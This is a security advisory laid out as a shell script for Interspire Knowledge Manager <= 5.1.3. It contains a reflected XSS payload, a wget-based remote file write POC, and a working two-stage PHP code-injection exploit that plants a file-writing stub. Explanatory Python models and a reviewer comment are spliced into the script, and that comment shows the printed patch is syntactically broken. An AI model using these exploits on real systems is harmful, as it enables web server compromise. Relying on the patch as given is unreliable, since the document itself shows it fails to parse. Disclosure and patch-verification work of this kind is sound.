#!/bin/sh
#
# - Interspire Knowledge Manager -
#
# ======================================================================
# Table of Contents
#
# Affected Software....................................................1
# Severity.............................................................2
# Vendor's Description of Software.....................................3
# Description of Vulnerability.........................................4
# Solution.............................................................5
# Time Table...........................................................6
# Credits..............................................................7
# Patch................................................................8
# Sample Exploit.......................................................9
#
# ======================================================================
# 1) Affected Software
#
# * Interspire Knowledgebase Manager <= 5.1.3
#
# ======================================================================
# 2) Severity
#
# Rating: Critical
# Impact: Web server compromise, remote code injection
# Where: Remote
#
# ======================================================================
# 3) Vendor's Description of Software
#
# "Knowledge Management Software to Locate, Capture and Share Information
# With Your Team.
# Interspire Knowledge Manager allows you to share information from your
# website or Intranet with an enterprise-grade knowledge base, reducing
# customer support, improving staff productivity and eliminating time wasted
# searching for information across disparate systems such as shared folders
# and paper documents.
# Share knowledge easily & securely
# Already in use by over 2,000 small businesses, universities, non-profits
# and enterprise organizations"
#
# Product Link:
# http://www.interspire.com/knowledgemanager/
#
# ======================================================================
# 4) Description of Vulnerability
#
# Multiple vulnerabilities exist in the software with a range of impact.
# Known vulnerabilities include:
#
# Information Disclosure:
# The server's $_SERVER['DOCUMENT_ROOT'] is disclosed in the page source of
# admin/de/dialog/media_manager.php, as roots["dRoot"] = <DOCUMENT_ROOT>.
# An attacker can use it to map a relative path to an absolute filesystem
# path, or an absolute path to a web-accessible one, which is useful when
# targeting the file read and file write issues below.
# - fix: no fix available
#
# Cross Site Scripting:
# Many XSS holes exist. One sample reflected (non-persistent) XSS, with many
# more of the same kind:
# admin/de/colormenu.php?sp=f";alert('xss');a="
# (the sp parameter is reflected inside a double-quoted JavaScript string,
# so the payload closes the string and injects a statement)
# - fix: no fix available
#
# SQL Injection:
# Nearly every query is vulnerable to SQL injection with PHP magic quotes
# turned off. Input validation fails at many levels, so some SQL injection
# is still likely with magic quotes on (e.g. a value used in a numeric
# context needs no quote character to break out of the query).
# - fix: turn on magic quotes as a stop-gap only; magic_quotes_gpc is
#   deprecated and later removed from PHP, and it does nothing for unquoted
#   values. Parameterised queries are the real fix.
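The numeric-context case mentioned above, as an added example that is not part of the advisory or of Interspire's code: a sqlite3 model of a query built by string concatenation after magic-quotes-style escaping, beside the parameterised form. The articles table, the addslashes emulation and the inputs are constructed for the example; sqlite stands in for the product's real database.

```python
import sqlite3

# Constructed sample data standing in for the knowledge-base article table.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
INSERT INTO articles VALUES (1, 'Public FAQ', 1);
INSERT INTO articles VALUES (2, 'Internal admin notes', 0);
"""


def addslashes(value):
    """Emulates what magic_quotes_gpc did to request data: backslash-escape
    single quotes, double quotes, backslashes and NUL. Nothing else changes."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def lookup_with_magic_quotes(conn, article_id):
    """Query built by concatenation. The id sits in an unquoted (numeric)
    context, so the escaping above never matters: no quote is needed."""
    sql = ("SELECT id, title FROM articles WHERE published = 1 AND id = "
           + addslashes(article_id))
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, article_id):
    """The fix that does not depend on php.ini: bind the value. The driver
    compares the column to the literal text, which can never become SQL."""
    return conn.execute(
        "SELECT id, title FROM articles WHERE published = 1 AND id = ?",
        (article_id,),
    ).fetchall()


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def demo():
    """Returns (benign, attack, parameterised) result sets for the same input."""
    conn = open_sample_db()
    benign = lookup_with_magic_quotes(conn, "1")
    # The unpublished article leaks although magic quotes are "on":
    attack = lookup_with_magic_quotes(conn, "1 OR 1=1")
    # The same attacker input against the bound query returns nothing:
    safe = lookup_parameterised(conn, "1 OR 1=1")
    return benign, attack, safe


if __name__ == "__main__":
    for label, rows in zip(("benign", "attack", "parameterised"), demo()):
        print(label, rows)
```

The attack string contains no quote, backslash or NUL, so addslashes() returns it unchanged and the resulting WHERE clause reads `published = 1 AND id = 1 OR 1=1`, which matches every row.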
#
# Remote File Read:
# The application blindly accepts user data, unfiltered, and reads files from
# the file system:
# admin/de/dialog/file_manager.php?p=/file/to/read&w=1
# - fix: vendor is recommending purchasing version 5.1.3
#
# Remote File Write:
# The software has a "feature" that allows overwriting $_SESSION variables
# with $_GET variables. Parts of the software that assume these variables
# are trustworthy can then be abused by an unauthenticated user to write any
# file to the system, including PHP code: the first request plants a
# userdocroot value in the session, the second makes the server fetch a URL
# and store it under userdocroot + file name.
# example POC code:
#
# #!/bin/sh
# if [ $# -ne 4 ]; then
#   echo "$0 <target_url> <relative_path_from_admin/de/dialog_dir> <file_name> <content_url>
# example: $0 http://target.com/knowledge_base ../../../ file.php http://source
# if kb is installed at knowledge_base, then the file file.php will be
# created in the base application directory from the content at http://source"
#   exit 1
# fi
# sessionUrl="$1/admin/de/dialog/file_manager.php"
# uploadUrl="$1/admin/de/dialog/callback.snipshot.php"
# # the userdocroot GET parameter is copied straight into the session
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies \
#   "$sessionUrl?userdocroot=$2&imgDir=&obj=1"
# echo "session created, setting file name $2$3"
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies \
#   "$uploadUrl?action=step1&source_image=name&save_file_as=$3"
# echo "upload content from: $4 ..."
# # the server fetches $4 itself and writes it to userdocroot + file name
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies \
#   "$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
# echo "file created, test access to the script at: $1/admin/de/dialog/$2$3"
#
# - fix: vendor is recommending purchasing version 5.1.3
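A model of the chain described above, added here and not code from the advisory or from Interspire: two small functions stand in for file_manager.php (which copies GET parameters over the session) and callback.snipshot.php (which writes the fetched content under session['userdocroot']), replayed with the POC's parameters in a scratch directory, beside a hardened pair that whitelists the session keys a request may set and confines the write to an upload directory. The directory layout, the ALLOWED_* sets, the dialog_dir session key and the file content are assumptions made for the example.

```python
import os
import tempfile

# ---- Models of the vulnerable endpoints (reconstructed from the advisory) ----

def file_manager_vulnerable(session, get):
    """The "feature": every GET parameter overwrites the same-named session
    variable, so any visitor can set session['userdocroot']."""
    session.update(get)


def callback_vulnerable(session, get, content):
    """Trusts session['userdocroot'] and writes the fetched content to
    <dialog dir>/<userdocroot><save_file_as> without any confinement."""
    target = os.path.join(session["dialog_dir"],
                          session["userdocroot"] + get["save_file_as"])
    with open(target, "wb") as fh:
        fh.write(content)
    return os.path.realpath(target)


# ---- Hardened counterparts (assumed policy, not the vendor's fix) ----

ALLOWED_SESSION_KEYS = {"imgDir", "obj"}                # benign UI state only
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}  # image uploads only


def file_manager_hardened(session, get):
    """Copy only explicitly whitelisted keys; the document root is server
    configuration and is never taken from the request."""
    for key in ALLOWED_SESSION_KEYS & get.keys():
        session[key] = get[key]


def callback_hardened(session, get, content):
    """Accept a bare file name with an image extension and write it only
    inside the upload directory, comparing canonical (realpath) paths."""
    upload_dir = os.path.realpath(os.path.join(session["dialog_dir"], "uploads"))
    name = get["save_file_as"]
    if not name or os.path.basename(name) != name or name in (".", ".."):
        raise ValueError("file name must be a bare name")
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("file type not allowed")
    os.makedirs(upload_dir, exist_ok=True)
    target = os.path.realpath(os.path.join(upload_dir, name))
    if os.path.commonpath([upload_dir, target]) != upload_dir:
        raise ValueError("path escapes upload directory")
    with open(target, "wb") as fh:
        fh.write(content)
    return target


def demo():
    """Replays the POC's parameters (userdocroot=../../../, file.php) against
    both models in a throw-away tree. Returns (path written by the vulnerable
    model relative to the app root, hardened model's error, path of a
    legitimate image accepted by the hardened model, whether the hardened
    session adopted userdocroot)."""
    root = os.path.realpath(tempfile.mkdtemp())
    app = os.path.join(root, "knowledge_base")
    dialog = os.path.join(app, "admin", "de", "dialog")
    os.makedirs(dialog)
    step0 = {"userdocroot": "../../../", "imgDir": "", "obj": "1"}
    step2 = {"action": "step2", "save_file_as": "file.php"}
    payload = b"<?php echo 'owned'; ?>"   # stands in for the fetched content

    session = {"dialog_dir": dialog}
    file_manager_vulnerable(session, step0)
    written = callback_vulnerable(session, step2, payload)

    session = {"dialog_dir": dialog}
    file_manager_hardened(session, step0)
    adopted = "userdocroot" in session
    try:
        callback_hardened(session, step2, payload)
        error = None
    except ValueError as exc:
        error = str(exc)
    legit = callback_hardened(session, {"save_file_as": "logo.png"}, b"\x89PNG")
    return os.path.relpath(written, app), error, os.path.relpath(legit, app), adopted


if __name__ == "__main__":
    print(demo())
```

The vulnerable pair lands file.php in the application root exactly as the POC promises; the hardened pair never reads a root from the session at all, and the realpath/commonpath comparison is what stops a traversal even if a whitelisted key were later misused.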
#
# PHP code Injection:
# The software has a feature that connects to Interspire to find the latest
# version of the software, which is then cached in a PHP file
# (admin/tmp/LatestVersion.php). The version number is taken from a request
# parameter ($_REQUEST['v'] in admin/remote.php) and written directly into
# that PHP file, so anyone with web access to the software can inject PHP
# code and execute it remotely.
# - fix: vendor has said that a fix will be available for purchase during
#   the next release cycle. An alternate patch is available in this advisory.
#
# ======================================================================
# 5) Solution
#
# Remote file reads, writes and code injection can be fixed by purchasing
# version 5.1.3 and applying the included patch to the PHP code. The other
# vulnerabilities are hopefully addressed in the next release cycle.
#
# file to patch: admin/remote.php (patch in section 8)
#
# ======================================================================
# 6) Time Table
#
# 1/15/2009 - Vendor notified.
# 2/02/2010 - Vendor responded that vulnerability would be addressed in next
#             software version and no security patch would be made available
#             to customers.
# 2/03/2010 - Non-vendor patch created to solve remote code injection
#             problem.
# ======================================================================
# 7) Credits
#
# Cory Marsh
#
# ======================================================================
# 8) Patch: context diff for admin/remote.php:
#
*** remote.orig.php 2010-02-03 08:44:19.116062114 -0000
--- remote.php 2010-02-03 08:49:22.086078275 -0000
***************
*** 28,34 ****
if (isset($_REQUEST['type'])) {
switch ($_REQUEST['type']) {
case 'saveVersion':
! if(!isset($_REQUEST['v'])) {
exit;
}
--- 28,34 ----
if (isset($_REQUEST['type'])) {
switch ($_REQUEST['type']) {
case 'saveVersion':
! if(!isset($_REQUEST['v']) ||
!preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) {
exit;
}
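Review bot: the changed `if` in this hunk is missing a closing parenthesis: `if(!isset($_REQUEST['v']) || !preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) {` closes `isset(` and `preg_match(` but never the outer `if(`, so admin/remote.php stops parsing as soon as the patch is applied; it needs `... $_REQUEST['v'])) {`. The condition should also sit on one physical line: a continuation line beginning with `!preg_match` is read by `patch` as the `!` change marker followed by `preg_match(...)`, which silently drops the negation. Two smaller points on the same check: without the `D` modifier PCRE's `$` also matches before a trailing newline, so a value such as `5.1.3\n` passes and is written into the cache file, which `\z` (or `/D`) would prevent; and `[0-9a-zA-Z\.]{1,25}` still admits any mix of letters and dots, where a version only needs something like `^[0-9]+(\.[0-9]+)*\z`.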
#
# ======================================================================
# 9) Sample exploit, use this to verify the patch.
#
# This POC example can be used to verify vulnerable software, and then
# verify that the patch worked correctly. The script modifies the
# admin/tmp/LatestVersion.php script so that, in addition to defining the
# latest software version, it also writes a file to the filesystem at the
# path passed as POST parameter "f", with the contents of POST parameter "u".
# It then uses this LatestVersion.php script to create a new file
# admin/incadd_set.php that simply echoes back the GET parameter "cmd"
# (proof that attacker-supplied PHP runs; it does not execute "cmd" as a
# shell command). After applying the supplied patch, this exploit script
# should no longer work.
#
if [ $# -ne 1 ]; then
  echo "usage: $0 <remote_url_to_interspire_base>
example: $0 http://www.remotehost/help"
  exit 1
fi
vulnerable="$1/admin/remote.php"
compromised="$1/admin/tmp/LatestVersion.php"
# Stage 1: the version string closes the cached array literal, appends a
# file-writing stub and re-opens the array so the cache stays valid PHP.
echo "type=saveVersion&v=5.1.3','lastCheck'=>time());if(isset(\$_POST['f']))file_put_contents(\$_POST['f'],stripslashes(\$_POST['u']));\$a=array('" > injection.txt
# Stage 2: use the stub to drop a PHP file that echoes the cmd parameter.
echo "f=../incadd_set.php&u=<pre><?echo(\$_GET['cmd']);" > code.txt
wget -q -O /dev/null --post-file=injection.txt "$vulnerable"
wget -q -O /dev/null --post-file=code.txt "$compromised"
echo "code installed at: $1/admin/incadd_set.php?cmd=whoami;ls /etc"
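The breakout used by the PHP code injection (section 4) and by the sample exploit above, as an added example that is neither the advisory's nor Interspire's code: a Python model of the version-cache writer. CACHE_TEMPLATE is an assumption, reconstructed so that the exploit's payload closes and re-opens the array exactly as the POC expects; the real admin/tmp/LatestVersion.php is not on the page. PATCH_RE is the expression from the supplied patch, STRICT_RE a tighter alternative, and the block also exercises the trailing-newline gap that `$` leaves open (Python's `$` behaves like PCRE's here).

```python
import re

# Assumed shape of admin/tmp/LatestVersion.php; reconstructed from the payload
# in the sample exploit, not copied from the product.
CACHE_TEMPLATE = "<?php\n$a=array('version'=>'{v}','lastCheck'=>time());\n"

# The value the sample exploit posts as v, verbatim from injection.txt.
PAYLOAD = ("5.1.3','lastCheck'=>time());"
           "if(isset($_POST['f']))file_put_contents($_POST['f'],stripslashes($_POST['u']));"
           "$a=array('")

# Character class and length limit from the supplied patch to admin/remote.php.
PATCH_RE = re.compile(r"^[0-9a-zA-Z\.]{1,25}$")
# Tighter alternative: dotted numeric version only, anchored with \Z (PCRE \z)
# so that a trailing newline cannot slip past the end anchor.
STRICT_RE = re.compile(r"\A[0-9]{1,5}(\.[0-9]{1,5}){0,3}\Z")


def write_cache_vulnerable(version):
    """saveVersion before the patch: the request value lands in PHP source."""
    return CACHE_TEMPLATE.format(v=version)


def version_ok_patch(version):
    return PATCH_RE.match(version) is not None


def version_ok_strict(version):
    return STRICT_RE.match(version) is not None


def write_cache_checked(version, check=version_ok_strict):
    """saveVersion with a validator in front of the write."""
    if not check(version):
        raise ValueError("rejected version string")
    return CACHE_TEMPLATE.format(v=version)


def contains_injected_code(php_source):
    """True when the cache file carries more than the two expected array
    entries, i.e. when the version string escaped its quoted context."""
    return php_source.count("$a=array(") > 1 or "file_put_contents" in php_source


def demo():
    """Returns the observations a verifier of the patch cares about."""
    results = {}
    vulnerable_file = write_cache_vulnerable(PAYLOAD)
    results["payload_injects_without_check"] = contains_injected_code(vulnerable_file)
    results["patch_rejects_payload"] = not version_ok_patch(PAYLOAD)
    results["strict_rejects_payload"] = not version_ok_strict(PAYLOAD)
    # '$' matches before a final newline in both PCRE and Python:
    results["patch_accepts_trailing_newline"] = version_ok_patch("5.1.3\n")
    results["strict_accepts_trailing_newline"] = version_ok_strict("5.1.3\n")
    results["strict_accepts_real_version"] = version_ok_strict("5.1.3")
    results["checked_output_clean"] = not contains_injected_code(write_cache_checked("5.1.3"))
    return results


if __name__ == "__main__":
    print(write_cache_vulnerable(PAYLOAD))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the payload the unpatched writer produces `$a=array('version'=>'5.1.3','lastCheck'=>time());if(isset($_POST['f']))...;$a=array('','lastCheck'=>time());`, which is valid PHP and is exactly the stub the second stage of the exploit posts to. Both regexes reject that payload because of the quotes and parentheses, but only the `\Z`-anchored one rejects a version with a trailing newline.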